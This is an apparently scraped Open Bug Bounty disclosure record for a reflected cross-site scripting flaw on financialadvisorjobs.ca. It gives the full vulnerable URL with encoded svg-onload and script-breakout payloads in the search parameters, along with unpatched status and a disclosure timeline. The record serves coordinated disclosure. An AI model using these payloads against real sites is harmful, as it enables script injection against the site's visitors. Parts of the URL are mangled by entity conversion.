financialadvisorjobs.ca XSS vulnerability

2017-05-18T13:34:00
ID OBB:238712
Type openbugbounty
Reporter Zachh
Modified 2017-08-10T14:16:00

Description

Vulnerable URL:
http://www.financialadvisorjobs.ca/frontoffice/seekerSearchJobDispatchAction.do?sitecode=pl115&keywords;=Keywords%3B+e.g.+advisor&keywords;=%22%3E%3Csvg+onload%3Dconfirm%28%2FOPENBUGBOUNTY%2F%29%3E&keyword;=+1%22--%3E%3C%2Fscript%3E%3Csvg%2Fonload%3D%27%3Bconfirm%28%2FOPENBUGBOUNTY%2F%29%3B%27%3E⊂_search=Sub-Search&prePageIds;=1511746&prePageIds;=1509094&prePageIds;=1501358&prePageIds;=1508142&searchUID;=-1ecab0bc%3A15c0afcd264%3A-3ced&actionFrom;=&totalSize;=4&sortedit;=ℴ=desc&sortField;=post_date&currentPage;=1&pageSize;=20&gopage;=&searchJobId;=&jobTitleKeywords;=&companyNameKeywords;=&countryCode;=&provinceCode;=&permanent;=&contract;=&fullTime;=&partTime;=&companyId;=&yearSalary;=&hourSalary;=&postDateId;=&searchAgentId;=&showAll;=true&jobId;=&jobNumber;=&page;=search
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 10.08.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 16427586
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 18 May, 2017 13:34 GMT
Generic security notifications sent to website owner| 27 May, 2017 03:52 GMT
Vulnerability details disclosed by researcher| 10 August, 2017 14:16 GMT